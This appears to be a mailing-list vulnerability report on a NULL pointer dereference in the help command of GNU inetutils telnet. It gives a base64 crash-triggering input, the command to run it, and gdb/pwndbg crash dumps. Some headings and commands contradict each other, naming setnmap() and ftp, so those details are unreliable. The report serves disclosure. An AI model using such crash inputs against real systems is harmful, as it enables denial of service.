Line 1: # NULL Pointer Dereference in help() at inetutils/telnet/commands.c:3094
AiDai <wyxai...@gmail.com> 于2021年12月23日周四 21:13写道: > **command:** > > ``` > ./telnet < ./poc > ``` > > AiDai <wyxai...@gmail.com> 于2021年12月23日周四 21:11写道: > >> # NULL Pointer Dereference in setnmap() at cmds.c:2303 >> >> ## Description >> >> A NULL Pointer Dereference was discovered in help() at >> inetutils/telnet/commands.c:3094. The vulnerability causes a segmentation >> fault and application crash. >> >> **version** >> >> ``` >> ./telnet --version >> telnet (GNU inetutils) 2.2.16-cf091 >> Copyright (C) 2021 Free Software Foundation, Inc. >> License GPLv3+: GNU GPL version 3 or later < >> https://gnu.org/licenses/gpl.html>. >> This is free software: you are free to change and redistribute it. >> There is NO WARRANTY, to the extent permitted by law. >> >> Written by many authors. >> ``` >> >> **System information** >> Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz >> >> ## Proof of Concept >> >> **poc** >> >> ``` >> base64 poc >> >> ID8JCQn/CQn/CQj/////CQlkCQkJCQnwCQkJCQloCQkJCQn/////CQlkCQkJCQnwCQkJ7ekJCQkJ >> CQkJCeoICQkZCQkJKiwJCQkJCQkJCQkJCQk= >> ``` >> >> **command:** >> >> ``` >> ./ftp < ./poc >> ``` >> >> **Result** >> >> ``` >> ./telnet < poc >> telnet> ?Invalid help command � >> ?Invalid help command � >> ?Invalid help command���� >> display operating parameters >> ?Invalid help command � >> [3] 398703 segmentation fault ./telnet < poc >> ``` >> >> **gdb** >> >> ``` >> Breakpoint 2, 0x000055555555dbd3 in help (argc=8, argv=0x55555557c130 >> <margv+48>) at commands.c:3094 >> 3094 printf ("%s\n", c->help); >> LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA >> ────────────────────────────────────────────[ REGISTERS >> ]───────────────────────────────────────────── >> *RAX 0x0 >> *RBX 0x55555557b480 (cmdtab2) —▸ 0x555555571232 ◂— 0x6f6400706c6568 /* >> 'help' */ >> RCX 0x0 >> *RDX 0xc6 >> *RDI 0x0 >> *RSI 0x5555555719cc ◂— 0x646f6d7263 /* 'crmod' */ >> R8 0x0 >> *R9 0x18 >> R10 0x555555572ee2 ◂— 0x2500454d4f48000a /* '\n' */ >> R11 0x246 >> *R12 0x55555557befd (line+29) ◂— 0xffff090909090068 /* 'h' */ >> R13 0x7fffffffe210 ◂— 0x1 >> R14 0x0 >> R15 0x0 >> RBP 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0 >> RSP 0x7fffffffe040 —▸ 0x55555557c130 (margv+48) —▸ 0x55555557befd >> (line+29) ◂— 0xffff090909090068 /* 'h' */ >> RIP 0x55555555dbd3 (help+212) ◂— call 0x555555559790 >> ──────────────────────────────────────────────[ DISASM >> ]────────────────────────────────────────────── >> 0x55555555dbcc <help+205> mov rax, qword ptr [rbx + 8] >> 0x55555555dbd0 <help+209> mov rdi, rax >> ► 0x55555555dbd3 <help+212> call puts@plt <puts@plt> >> s: 0x0 >> >> 0x55555555dbd8 <help+217> sub dword ptr [rbp - 0x14], 1 >> 0x55555555dbdc <help+221> cmp dword ptr [rbp - 0x14], 0 >> 0x55555555dbe0 <help+225> jg help+116 <help+116> >> >> 0x55555555dbe2 <help+227> mov eax, 0 >> 0x55555555dbe7 <help+232> add rsp, 0x10 >> 0x55555555dbeb <help+236> pop rbx >> 0x55555555dbec <help+237> pop r12 >> 0x55555555dbee <help+239> pop rbp >> ──────────────────────────────────────────[ SOURCE (CODE) >> ]─────────────────────────────────────────── >> In file: /root/disk2/fuzzing/inetutils/inetutils/telnet/commands.c >> 3089 if (Ambiguous (c)) >> 3090 printf ("?Ambiguous help command %s\n", arg); >> 3091 else if (c == (Command *) 0) >> 3092 printf ("?Invalid help command %s\n", arg); >> 3093 else >> ► 3094 printf ("%s\n", c->help); >> 3095 } >> 3096 return 0; >> 3097 } >> 3098 >> 3099 static char *rcname = 0; >> ──────────────────────────────────────────────[ STACK >> ]─────────────────────────────────────────────── >> 00:0000│ rsp 0x7fffffffe040 —▸ 0x55555557c130 (margv+48) —▸ >> 0x55555557befd (line+29) ◂— 0xffff090909090068 /* 'h' */ >> 01:0008│ 0x7fffffffe048 ◂— 0x85557bee1 >> 02:0010│ 0x7fffffffe050 —▸ 0x55555557b440 (cmdtab+480) —▸ >> 0x55555557121b ◂— 0x616c70736944003f /* '?' */ >> 03:0018│ 0x7fffffffe058 —▸ 0x555555559d20 (_start) ◂— endbr64 >> 04:0020│ rbp 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0 >> 05:0028│ 0x7fffffffe068 —▸ 0x55555555dab9 (command+550) ◂— test >> eax, eax >> 06:0030│ 0x7fffffffe070 ◂— 0x0 >> 07:0038│ 0x7fffffffe078 ◂— 0x100000000 >> ────────────────────────────────────────────[ BACKTRACE >> ]───────────────────────────────────────────── >> ► f 0 0x55555555dbd3 help+212 >> f 1 0x55555555dab9 command+550 >> f 2 0x55555555e3c8 main+776 >> f 3 0x7ffff7db50b3 __libc_start_main+243 >> >> ────────────────────────────────────────────────────────────────────────────────────────────────────── >> pwndbg> bt >> #0 0x000055555555dbd3 in help (argc=8, argv=0x55555557c130 <margv+48>) >> at commands.c:3094 >> #1 0x000055555555dab9 in command (top=1, tbuf=0x0, cnt=0) at >> commands.c:3044 >> #2 0x000055555555e3c8 in main (argc=0, argv=0x7fffffffe220) at main.c:423 >> #3 0x00007ffff7db50b3 in __libc_start_main (main=0x55555555e0c0 <main>, >> argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, >> rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at >> ../csu/libc-start.c:308 >> #4 0x0000555555559d4e in _start () >> ``` >> >> crash >> >> ``` >> Program received signal SIGSEGV, Segmentation fault. >> __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 >> 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or >> directory. >> LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA >> ────────────────────────────────────────────[ REGISTERS >> ]───────────────────────────────────────────── >> RAX 0x0 >> RBX 0x55555557b480 (cmdtab2) —▸ 0x555555571232 ◂— 0x6f6400706c6568 /* >> 'help' */ >> RCX 0x0 >> *RDX 0x0 >> RDI 0x0 >> RSI 0x5555555719cc ◂— 0x646f6d7263 /* 'crmod' */ >> R8 0x0 >> R9 0x18 >> R10 0x555555572ee2 ◂— 0x2500454d4f48000a /* '\n' */ >> R11 0x246 >> *R12 0x0 >> R13 0x7fffffffe210 ◂— 0x1 >> R14 0x0 >> R15 0x0 >> RBP 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ 0x7fffffffe120 ◂— 0x0 >> *RSP 0x7fffffffe008 —▸ 0x7ffff7e155b4 (puts+20) ◂— mov r13, qword ptr >> [rip + 0x16398d] >> *RIP 0x7ffff7f19675 (__strlen_avx2+21) ◂— vpcmpeqb ymm1, ymm0, ymmword >> ptr [rdi] >> ──────────────────────────────────────────────[ DISASM >> ]────────────────────────────────────────────── >> ► 0x7ffff7f19675 <__strlen_avx2+21> vpcmpeqb ymm1, ymm0, ymmword ptr >> [rdi] >> 0x7ffff7f19679 <__strlen_avx2+25> vpmovmskb eax, ymm1 >> 0x7ffff7f1967d <__strlen_avx2+29> test eax, eax >> 0x7ffff7f1967f <__strlen_avx2+31> jne __strlen_avx2+272 >> <__strlen_avx2+272> >> ↓ >> 0x7ffff7f19770 <__strlen_avx2+272> tzcnt eax, eax >> 0x7ffff7f19774 <__strlen_avx2+276> add rax, rdi >> 0x7ffff7f19777 <__strlen_avx2+279> sub rax, rdx >> 0x7ffff7f1977a <__strlen_avx2+282> vzeroupper >> 0x7ffff7f1977d <__strlen_avx2+285> ret >> >> 0x7ffff7f1977e <__strlen_avx2+286> nop >> 0x7ffff7f19780 <__strlen_avx2+288> tzcnt eax, eax >> ──────────────────────────────────────────────[ STACK >> ]─────────────────────────────────────────────── >> 00:0000│ rsp 0x7fffffffe008 —▸ 0x7ffff7e155b4 (puts+20) ◂— mov r13, >> qword ptr [rip + 0x16398d] >> 01:0008│ 0x7fffffffe010 —▸ 0x55555557b480 (cmdtab2) —▸ 0x555555571232 >> ◂— 0x6f6400706c6568 /* 'help' */ >> 02:0010│ 0x7fffffffe018 —▸ 0x7fffffffe060 —▸ 0x7fffffffe090 —▸ >> 0x7fffffffe120 ◂— 0x0 >> 03:0018│ 0x7fffffffe020 —▸ 0x55555557befd (line+29) ◂— >> 0xffff090909090068 /* 'h' */ >> 04:0020│ 0x7fffffffe028 —▸ 0x7fffffffe210 ◂— 0x1 >> 05:0028│ 0x7fffffffe030 ◂— 0x0 >> 06:0030│ 0x7fffffffe038 —▸ 0x55555555dbd8 (help+217) ◂— sub dword >> ptr [rbp - 0x14], 1 >> 07:0038│ 0x7fffffffe040 —▸ 0x55555557c130 (margv+48) —▸ >> 0x55555557befd (line+29) ◂— 0xffff090909090068 /* 'h' */ >> ────────────────────────────────────────────[ BACKTRACE >> ]───────────────────────────────────────────── >> ► f 0 0x7ffff7f19675 __strlen_avx2+21 >> f 1 0x7ffff7e155b4 puts+20 >> f 2 0x55555555dbd8 help+217 >> f 3 0x55555555dab9 command+550 >> f 4 0x55555555e3c8 main+776 >> f 5 0x7ffff7db50b3 __libc_start_main+243 >> ``` >> >>